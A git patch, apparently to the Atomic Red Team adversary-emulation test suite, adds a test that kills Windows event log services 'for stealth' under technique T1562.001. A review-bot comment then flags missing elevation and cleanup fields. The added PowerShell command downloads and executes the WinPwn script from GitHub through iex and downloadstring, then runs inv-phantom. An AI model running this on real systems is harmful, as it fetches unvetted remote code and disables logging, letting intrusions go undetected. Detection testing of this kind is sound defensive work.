From 04edc6cdc1a1baeb5e69eaefdb26ed87d999fcbe Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:54:22 -0500
Subject: [PATCH] Update T1562.001.yaml (#1956)

Kill the event log services for stealth via function of WinPwn

Co-authored-by: Carrie Roberts
---
 atomics/T1562.001/T1562.001.yaml | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 36b02dd0..e40b7c59 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -633,4 +633,13 @@ atomic_tests:
       command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true
-
+- name: WinPwn - Kill the event log services for stealth
+  description: Kill the event log services for stealth via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      inv-phantom -consoleoutput -noninteractive
+    name: powershell
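Review bot: The new `WinPwn - Kill the event log services for stealth` entry declares neither `cleanup_command` nor `elevation_required`, so a run leaves the host without working event logging and the test is listed as runnable from a non-elevated session. Interfering with the event log service presumably needs an administrator context, as the Backstab test just above declares; add `elevation_required: true` under `executor:` together with a cleanup such as `cleanup_command: Restart-Service -Name EventLog -Force -ErrorAction Ignore`, and confirm on a lab host that this actually restores logging (otherwise say in `description` that a reboot is needed). Separately, only `WinPwn.ps1` is pinned to a commit; anything the script later fetches through `$S3cur3Th1sSh1t_repo` is likely taken from the unpinned base URL, so the code that executes can change between runs, and `description` should say so. The preceding test entry starts outside this hunk.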